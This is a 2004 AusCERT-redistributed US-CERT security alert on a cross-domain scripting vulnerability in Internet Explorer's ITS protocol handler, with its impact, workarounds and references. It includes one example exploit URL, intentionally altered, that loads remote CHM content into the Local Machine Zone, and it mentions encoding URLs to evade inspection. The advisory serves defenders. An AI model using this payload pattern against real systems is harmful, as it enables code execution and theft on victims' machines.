Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2004.0261 -- US-CERT Technical Cyber Security Alert TA04-099A Vulnerability in Internet Explorer ITS Protocol Handler 09 April 2004 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Internet Explorer Any programs that use the WebBrowser ActiveX control Any programs that use the IE HTML rendering engine Publisher: CERT/CC Operating System: Windows Impact: Execute Arbitrary Code/Commands Access Required: Remote CVE Names: CAN-2004-0380 Ref: AU-2004.007 - --------------------------BEGIN INCLUDED TEXT-------------------- - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vulnerability in Internet Explorer ITS Protocol Handler Original release date: April 8, 2004 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows systems running Internet Explorer Overview A cross-domain scripting vulnerability in Microsoft Internet Explorer (IE) could allow an attacker to execute arbitrary code with the privileges of the user running IE. The attacker could also read and manipulate data on web sites in other domains or zones. I. Description There is a cross-domain scripting vulnerability in the way ITS protocol handlers determine the security domain of an HTML component stored in a Compiled HTML Help (CHM) file. The HTML Help system "...uses the underlying components of Microsoft Internet Explorer to display help content. It supports HTML, ActiveX, Java, [and] scripting languages (JScript, and Microsoft Visual Basic Scripting Edition)." CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects. IE provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has the ability to access parts of MIME Encapsulation of Aggregate HTML Documents (MHTML) using the mhtml: protocol handler. When IE references an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, the ITS protocol handlers can access a CHM file from an alternate source. IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model. Any programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs. Any programs, including other web browsers, that use the IE protocol handlers (URL monikers) could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively). NOTE: Using an alternate web browser may not mitigate this vulnerability. It may be possible for a web browser other than IE on a Windows system to invoke IE to handle ITS protocol URLs. US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380. II. Impact By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. The attacker could also read or modify data in other web sites (including reading cookies or content and modifying or creating content). Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some example of malicious code that exploit this vulnerability. It is important to note that any arbitrary executable payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names. A malicious web site or email message may contain HTML similar to the following: ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl oit_chm::exploit_html (This URL is intentionally modified to avoid detection by anti-virus software.) In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code. Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software. III. Solution Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below. Disable ITS protocol handlers Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it ss,its,mk} Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed. Follow good Internet security practices These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. * Disable Active scripting and ActiveX controls NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes. * Do not follow unsolicited links Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. * Maintain updated anti-virus software Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Appendix B. References * Vulnerability Note VU#323070 - <http://www.kb.cert.org/vuls/id/323070> * US-CERT Computer Virus Resources - <http://www.us-cert.gov/other_sources/viruses.html> * CVE CAN-2004-0380 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380> * Introduction to URL Security Zones - <http://msdn.microsoft.com/workshop/security/szone/overview/overvi ew.asp> * About Cross-Frame Scripting and Security - <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec urity.asp> * MIME Type Determination in Internet Explorer - <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap pendix_a.asp> * URL Monikers - <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as p> * Asynchronous Pluggable Protocols - <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable .asp> * Microsoft HTML Help 1.4 SDK - <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta rt.asp> * Microsoft Knowledge Base Article 182569 - <http://support.microsoft.com/default.aspx?scid=182569> * Microsoft Knowledge Base Article 174360 - <http://support.microsoft.com/default.aspx?scid=174360> * Microsoft Knowledge Base Article 833633 - <http://support.microsoft.com/default.aspx?scid=833633> * Windows XP Service Pack 2 Technical Preview - <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview. mspx > * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990> _________________________________________________________________ This vulnerability was reported by Thor Larholm. _________________________________________________________________ Feedback can be directed to the author: Art Manion. _________________________________________________________________ Copyright 2004 Carnegie Mellon University. Terms of use: <http://www.us-cert.gov/legal.html> Revision History April 8, 2004: Initial release - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/ sWme3VvhRbvk9KjNUNyTsbY= =kL0G - -----END PGP SIGNATURE----- - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 If you believe that your computer system has been compromised or attacked in any way, we encourage you to let us know by completing the secure National IT Incident Reporting Form at: http://www.auscert.org.au/render.html?it=3192 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQCVAwUBQHaU3Ch9+71yA2DNAQKlPQQAjh0Q6j236o1fajctenKc8A9M/MJL8g9e q0et14ZZP6Qj3BquLeBxeezze5MvcLT1K00PZQHGc8f5xvbX4coZJWzbi4ZRItwx oDVg7o/9c7gg6+o7RJoW958fwxSgkoW3AcipEQX/S/u1HtMXvSUIgFIE5XzJ/AYg ZAvBiRrYT8I= =CWLD -----END PGP SIGNATURE-----